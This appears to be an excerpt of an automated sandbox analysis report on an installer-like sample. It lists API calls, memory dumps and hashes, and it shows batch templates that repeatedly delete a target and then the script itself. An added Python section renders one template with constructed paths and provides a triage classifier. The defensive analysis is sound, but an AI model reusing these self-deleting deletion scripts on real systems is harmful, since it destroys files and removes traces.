• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Init_thread_footer$DirectoryFindHeapLibraryLoadProcessResourceSystem
• String ID: UxTheme.dll
• API String ID: 2586271605-352951104
• Opcode ID: 6c5b7e90eec531786ca98310131c315fee119b62475dcee8bcf8a44586da4261
• Instruction ID: 5d5cffaed7b16e6bead2ea4f98902d933aa2cdf7c92b4df82dc2b646a52c768a
• Opcode Fuzzy Hash: 6c5b7e90eec531786ca98310131c315fee119b62475dcee8bcf8a44586da4261
• Instruction Fuzzy Hash: A7A1ADB0500745EFE714DF64C818B9ABBF4FF04308F14865ED4299B681D7BAA618CF95
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,00000000,?,?,00000000), ref: 00CCCA3D
• FindClose.KERNEL32(00000000), ref: 00CCCA9C
  • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Find$AllocCloseFileFirstHeap
• String ID:
• API String ID: 2507753907-0
• Opcode ID: caedbcfb17abad958f4cf5202330de2053ee9438ae9804c98e802aff5229f407
• Instruction ID: 33421547967aba8ec48f875f0c83e55c33f25caf66ef2618baa5fabccc669d88
• Opcode Fuzzy Hash: caedbcfb17abad958f4cf5202330de2053ee9438ae9804c98e802aff5229f407
• Instruction Fuzzy Hash: FA31BE709046189FDB24DF15CD8DF6AB7B4EF48724F2081AEE929A3390E7715E44DB90
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00007F90,00007F90,00001388,00000000,?,1FC3D414,1FC3D414,?,?,?,?,00000000), ref: 00D0C379
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,1FC3D414,1FC3D414,?,?,?,?,00000000,00DF4595), ref: 00D0C39A
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Create$FileNamedPipe
• String ID:
• API String ID: 1328467360-0
• Opcode ID: b878a9d2292f121ef70fb61af01209d1d00d36b358a12d48db10650ca2ee1410
• Instruction ID: fde66132bee79cf8ec488819f3877c83dfa00d52396830bfda33701005cf83f5
• Opcode Fuzzy Hash: b878a9d2292f121ef70fb61af01209d1d00d36b358a12d48db10650ca2ee1410
• Instruction Fuzzy Hash: 7731E332A84745AFE720CF14CC05B9ABBA4EB01720F10C76AF9A9AB6D0D771A944CB54
Uniqueness
Uniqueness Score: -1.00%

APIs
• __set_se_translator.LIBVCRUNTIME ref: 00BEB0C8
• SetUnhandledExceptionFilter.KERNEL32(00CCB960), ref: 00BEB0DE
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionFilterUnhandled__set_se_translator
• String ID:
• API String ID: 2480343447-0
• Opcode ID: 55cbb5a142ea89f6e57d14f7d257f9b37fe18b66c77ef154ce5d236177b40c49
• Instruction ID: 12cf670ebdb859c53cb7ebc9c7a0b5ddea20180551dbdbbac044d90312526497
• Opcode Fuzzy Hash: 55cbb5a142ea89f6e57d14f7d257f9b37fe18b66c77ef154ce5d236177b40c49
• Instruction Fuzzy Hash: 5DE08676A00244BFC620A3A1DC4AF6B7F58EBA6710F08846BF64477262D77498498773
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000000,1FC3D414,?,?,00D12007,00000000,1FC3D414,?,00D12142), ref: 00D7FB03
• HeapFree.KERNEL32(00000000,?,00D12007,00000000,1FC3D414,?,00D12142), ref: 00D7FB0A
  • Part of subcall function 00D7F977: GetProcessHeap.KERNEL32(00000000,1FC3D414,?,00D7FADD,?,?,?,00D12007,00000000,1FC3D414,?,00D12142), ref: 00D7F98F
  • Part of subcall function 00D7F977: HeapFree.KERNEL32(00000000,?,00D7FADD,?,?,?,00D12007,00000000,1FC3D414,?,00D12142), ref: 00D7F996
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 604cc03c0a1efb40151fc5e241d70a04c21df8cf80d80044669ea1bb24129407
• Instruction ID: 5cbcfc6cf1d4b3323d5dbd561789086378c447d03089c5169f7ec3c99ba51049
• Opcode Fuzzy Hash: 604cc03c0a1efb40151fc5e241d70a04c21df8cf80d80044669ea1bb24129407
• Instruction Fuzzy Hash: 2EF0A732100701ABDA352B55DD19F5B7B94DF80B61F19C039F58D52160EF71D884D675
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Init_thread_footer$HeapProcess
• String ID: |^
• API String ID: 275895251-2783013017
• Opcode ID: bf1dc009f6d00b0db34acfb6ec91e339c9f29693d15df0efebd99723676c1b5a
• Instruction ID: 519dba6400566e1e80cda58e9304b928c874e55d705c2038b302c6f53f998b6b
• Opcode Fuzzy Hash: bf1dc009f6d00b0db34acfb6ec91e339c9f29693d15df0efebd99723676c1b5a
• Instruction Fuzzy Hash: B46175B1900704DFE720CF25C45839ABFE0BF48308F148A9DD58A9B782DBB5E649CB91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
[Graph image not reproduced. It covers the basic blocks from 00CB4560 through 00CB4A7B, coloured by whether each block was executed or not executed during the run.]
APIs
  • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
• MoveFileW.KERNEL32(?,?), ref: 00CB46DA
• GetModuleHandleW.KERNEL32(kernel32,?), ref: 00CB471C
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00CB4764
• GetProcAddress.KERNEL32(00000000,SetDllDirectory), ref: 00CB47BC
• __Init_thread_footer.LIBCMT ref: 00CB47CC
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB4814
• __Init_thread_footer.LIBCMT ref: 00CB4774
  • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
  • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
  • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
• __Init_thread_footer.LIBCMT ref: 00CB4824
  • Part of subcall function 00C8A630: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C8A671
                                                                                                                                                                        Strings
                                                                                                                                                                        • SetDllDirectory, xrefs: 00CB47B6
                                                                                                                                                                        • kernel32, xrefs: 00CB4717
                                                                                                                                                                        • SetSearchPathMode, xrefs: 00CB475E
                                                                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00CB45D2
                                                                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00CB45F7
                                                                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00CB45F0, 00CB45FF
                                                                                                                                                                        • SetDefaultDllDirectories, xrefs: 00CB480E
                                                                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00CB45D7, 00CB45DF
                                                                                                                                                                        • kernel32.dll, xrefs: 00CB491F
                                                                                                                                                                        • @;, xrefs: 00CB48AF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer$AddressProc$CriticalSection$ConditionDirectoryEnterFileHandleHeapLeaveModuleMoveProcessSystemVariableWake
                                                                                                                                                                        • String ID: @;$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$SetDefaultDllDirectories$SetDllDirectory$SetSearchPathMode$kernel32$kernel32.dll
                                                                                                                                                                        • API String ID: 3437638698-1173364965
                                                                                                                                                                        • Opcode ID: a22f1f4c1e316a8d3cac47842324794cf6d98a2c58185fdc23c92069bdf3e312
                                                                                                                                                                        • Instruction ID: ac755fc1865096e2c5066e4c3c2d49f934ce6afefd83a1ad33876d9b967dcdfc
                                                                                                                                                                        • Opcode Fuzzy Hash: a22f1f4c1e316a8d3cac47842324794cf6d98a2c58185fdc23c92069bdf3e312
                                                                                                                                                                        • Instruction Fuzzy Hash: 85E15DB0901258DFDB20DF54E94ABDEBBB4FF55314F10511AE914BB392DBB09A08CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%
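
The five `@echo off ...` strings listed above are C printf-style templates for a cleanup batch file: `%%` is a literal `%`, each `%s` receives a path and `%lu` the retry limit, and the report shows them with their line breaks collapsed (the `:try` label, `if exist ... goto try` and, in the bounded variants, `timeout.exe 5` with a `count` cap still reveal the loop). The `del` and `rd` pairs cover a file and a directory respectively. The Python below is an added example, not code from the sample, from Joe Sandbox or from Advanced Installer (whose `Software\Caphyon\Advanced Installer\` and `Advinst_Extract_` strings sit in the same dump); it renders the complete unbounded `del` template with line breaks restored and offers a small recogniser for triaging a dropped batch file of this shape. The restored line breaks, the argument order (target path three times, then the batch file's own path twice for the `del "..." | cls` tail), the sample paths and the retry limit are assumptions or constructed values, and the bounded `rd` sample stops where the report truncates that template.

```python
import re

# Template copied from the first "@echo off" string in the report, with line breaks
# restored. ASSUMPTION: the report collapsed a newline before each label and command.
UNBOUNDED_DEL_TEMPLATE = (
    '@echo off\n'
    '%%SystemRoot%%\\System32\\attrib.exe -r "%s"\n'
    ':try\n'
    'del "%s"\n'
    'if exist "%s" goto try\n'
    '%%SystemRoot%%\\System32\\attrib.exe -r "%s"\n'
    'del "%s" | cls\n'
)


def render_unbounded_del(target: str, bat_path: str) -> str:
    """Fill the template the way a C printf would.
    ASSUMPTION on argument order: the first three %s are the file to delete, the last
    two the batch file itself (the `del ... | cls` tail is the usual self-delete of a
    running .bat, with cls swallowing the error text)."""
    return UNBOUNDED_DEL_TEMPLATE % (target, target, target, bat_path, bat_path)


# Retry loop: a :try label, then anything up to `if exist "<target>" goto try`.
_LOOP_RE = re.compile(
    r'^:try[ \t]*$(?P<body>.*?)^if exist "(?P<target>[^"]+)" goto try[ \t]*$',
    re.IGNORECASE | re.MULTILINE | re.DOTALL,
)
_OP_RE = re.compile(r'^(?P<op>del|rd)[ \t]+"(?P<path>[^"]+)"', re.IGNORECASE | re.MULTILINE)
_BOUND_RE = re.compile(r'^if %count% GTR (?P<n>\d+) goto break', re.IGNORECASE | re.MULTILINE)
_TIMEOUT_RE = re.compile(r'timeout\.exe[ \t]+\d+', re.IGNORECASE)
_TAIL_RE = re.compile(r'^del[ \t]+"(?P<bat>[^"]+)"[ \t]*\|[ \t]*cls', re.IGNORECASE | re.MULTILINE)


def classify_self_delete_batch(text: str):
    """Describe a retry-delete batch script, or return None when the
    :try / goto try loop is absent (unrelated scripts fall through)."""
    loop = _LOOP_RE.search(text)
    if loop is None:
        return None
    op = _OP_RE.search(loop.group('body'))      # the del/rd inside the loop body
    bound = _BOUND_RE.search(text)              # timeout.exe/count variant gives up after N tries
    tail = _TAIL_RE.search(text)                # `del "<bat>" | cls` tail
    return {
        'operation': op.group('op').lower() if op else None,
        'target': loop.group('target'),
        'bounded': bound is not None,
        'max_retries': int(bound.group('n')) if bound else None,
        'uses_timeout': _TIMEOUT_RE.search(text) is not None,
        'final_del_cls': tail is not None,
        'final_del_path': tail.group('bat') if tail else None,
    }


# Constructed sample of the bounded `rd` template (the one with timeout.exe and count)
# with its placeholders filled in. The report truncates that template after its final
# `attrib.exe -r "`, so the tail is omitted here rather than guessed.
BOUNDED_RD_SAMPLE = (
    '@echo off\n'
    '%SystemRoot%\\System32\\attrib.exe -r "C:\\Users\\user\\AppData\\Local\\Temp\\Advinst_Extract_0001"\n'
    'SET count=0\n'
    ':try\n'
    '%SystemRoot%\\System32\\timeout.exe 5\n'
    'SET /a count=%count%+1\n'
    'rd "C:\\Users\\user\\AppData\\Local\\Temp\\Advinst_Extract_0001"\n'
    'if %count% GTR 12 goto break\n'
    'if exist "C:\\Users\\user\\AppData\\Local\\Temp\\Advinst_Extract_0001" goto try\n'
    ':break\n'
)

if __name__ == '__main__':
    # Constructed paths; nothing here touches the filesystem.
    script = render_unbounded_del(r'C:\Users\user\Desktop\payload.exe',
                                  r'C:\Users\user\AppData\Local\Temp\cleanup.bat')
    print(script)
    print(classify_self_delete_batch(script))
    print(classify_self_delete_batch(BOUNDED_RD_SAMPLE))
```

Run stand-alone it prints the rendered script and both classifications. The unbounded variant spins on `del` until the target is gone, which is why a locked file keeps such a script alive indefinitely; the `timeout.exe`/`count` variant caps that, and the returned `max_retries` tells an analyst how long the dropper was willing to wait.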

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 00CE8094
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00CE80C8
                                                                                                                                                                          • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharInit_thread_footerMultiWide$FindHeapProcessResource
                                                                                                                                                                        • String ID: %hu$A valid language was received from commnad line. This is:$AI_BOOTSTRAPPERLANGS$Advinst_Extract_$Code returned to Windows by setup:$Language of a related product is:$Language selected programatically for UI:$Language used for UI:$Languages of setup:$P$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$Software\Caphyon\Advanced Installer\$a
                                                                                                                                                                        • API String ID: 1419962739-476803854
                                                                                                                                                                        • Opcode ID: 5d1b16f6eb372637ef5817b51968c25911f13b6e66a41eb26aaec9ea23ad7dbf
                                                                                                                                                                        • Instruction ID: 48644589e1af901fb2060609c2134ff57901ec97270b2c3b69389d0ed4ae79e9
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d1b16f6eb372637ef5817b51968c25911f13b6e66a41eb26aaec9ea23ad7dbf
                                                                                                                                                                        • Instruction Fuzzy Hash: 6C52F6709006899FDB10DBA9CC45BEEB7B4EF05310F1481ADE929A72D2DF709E08CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetActiveWindow.USER32 ref: 00CE7E50
                                                                                                                                                                        • SetLastError.KERNEL32(0000000E), ref: 00CE7E6D
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00CE7E85
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00E9E7BC), ref: 00CE7EA2
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00E9E7BC), ref: 00CE7EC5
                                                                                                                                                                        • DialogBoxParamW.USER32(000007D0,00000000,00C28D40,00000000), ref: 00CE7EE2
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 00CE8094
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00CE80C8
                                                                                                                                                                          • Part of subcall function 00CB6270: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,00000000,?,00000000,00DB225D,000000FF,?,80004005,?,?), ref: 00CB6288
                                                                                                                                                                          • Part of subcall function 00CB6270: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,80004005,?,?,?,00000000,00DE48ED,000000FF,?,00CB4B55), ref: 00CB62BA
                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,00000001,?,?), ref: 00CE8299
                                                                                                                                                                        • SetEvent.KERNEL32(?,00000000,?,?), ref: 00CE834F
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$CriticalEventInit_thread_footerSection$ActiveCurrentDialogEnterErrorHeapLastLeaveParamProcessThreadWindow
                                                                                                                                                                        • String ID: Advinst_Extract_$Code returned to Windows by setup:$FILES.7z$P^
                                                                                                                                                                        • API String ID: 1170959282-842124583
                                                                                                                                                                        • Opcode ID: 4025d806d42cbb9797fd66fc089939550b76a7fc22673b583bdab971001cb760
                                                                                                                                                                        • Instruction ID: e762d3012ebd280cd53e32a586a170f29ec5be4090f6732674750bc97059a967
                                                                                                                                                                        • Opcode Fuzzy Hash: 4025d806d42cbb9797fd66fc089939550b76a7fc22673b583bdab971001cb760
                                                                                                                                                                        • Instruction Fuzzy Hash: B792C330900249DFDB10DFA9CC49BEEB7B4EF45314F148299E519AB292DB749E48CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                         Control-flow Graph
                                                                                                                                                                         • Legend: Executed / Not Executed (block colouring is not preserved in this text rendering)
                                                                                                                                                                         • Blocks (node, address range, calls):
                                                                                                                                                                           • 2211 cf5ed0-cf5f01
                                                                                                                                                                           • 2212 cf5f07-cf5f21 GetActiveWindow
                                                                                                                                                                           • 2213 cf60c6-cf60d7
                                                                                                                                                                           • 2214 cf5f2f-cf5f37
                                                                                                                                                                           • 2215 cf5f23-cf5f25 call cee3f0
                                                                                                                                                                           • 2217 cf5f39-cf5f43 call d7fa13
                                                                                                                                                                           • 2218 cf5f52-cf5f61 call d7fb15
                                                                                                                                                                           • 2219 cf5f2a KiUserCallbackDispatcher
                                                                                                                                                                           • 2224 cf60ef-cf60f6 call bc8f60
                                                                                                                                                                           • 2225 cf5f67-cf5fcc GetCurrentThreadId EnterCriticalSection LeaveCriticalSection CreateDialogParamW
                                                                                                                                                                           • 2226 cf5f45-cf5f4d SetLastError
                                                                                                                                                                           • 2228 cf5fd2-cf5fe9 GetCurrentThreadId
                                                                                                                                                                           • 2229 cf60fb-cf6105 call bba850
                                                                                                                                                                           • 2232 cf604e
                                                                                                                                                                           • 2233 cf5feb-cf5ff2
                                                                                                                                                                           • 2234 cf6051-cf6079 SetWindowTextW GetDlgItem SetWindowTextW
                                                                                                                                                                           • 2236 cf6005-cf6042 call cd0180 call bb9bb0
                                                                                                                                                                           • 2237 cf5ff4-cf6000 call bd1a90 call cd7070
                                                                                                                                                                           • 2238 cf607b-cf6084 call bbab90
                                                                                                                                                                           • 2247 cf6086-cf60a8 call bba140
                                                                                                                                                                           • 2249 cf6044-cf604c
                                                                                                                                                                           • 2254 cf60da-cf60ed GetDlgItem SetWindowTextW
                                                                                                                                                                           • 2255 cf60aa-cf60bc
                                                                                                                                                                           • 2256 cf60be-cf60c1
                                                                                                                                                                         • Edges: 2211->2212, 2211->2213, 2212->2214, 2212->2215, 2214->2217, 2214->2218, 2215->2219, 2217->2218, 2217->2226, 2218->2224, 2218->2225, 2219->2214, 2224->2229, 2225->2228, 2226->2228, 2228->2232, 2228->2233, 2232->2234, 2233->2236, 2233->2237, 2234->2213, 2234->2238, 2236->2234, 2236->2249, 2237->2236, 2238->2229, 2238->2247, 2247->2254, 2247->2255, 2249->2234, 2254->2255, 2255->2213, 2255->2256, 2256->2213
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetActiveWindow.USER32 ref: 00CF5F0A
                                                                                                                                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?), ref: 00CF5F47
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00CF5FD2
                                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00CF605C
                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00CF6066
                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00CF6072
                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00CF60DF
                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00CF60E7
                                                                                                                                                                          • Part of subcall function 00CEE3F0: GetDlgItem.USER32(?,00000002), ref: 00CEE410
                                                                                                                                                                          • Part of subcall function 00CEE3F0: GetWindowRect.USER32(00000000,?), ref: 00CEE426
                                                                                                                                                                          • Part of subcall function 00CEE3F0: ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,00CF5F2A,?,?,?,?,?,?), ref: 00CEE43F
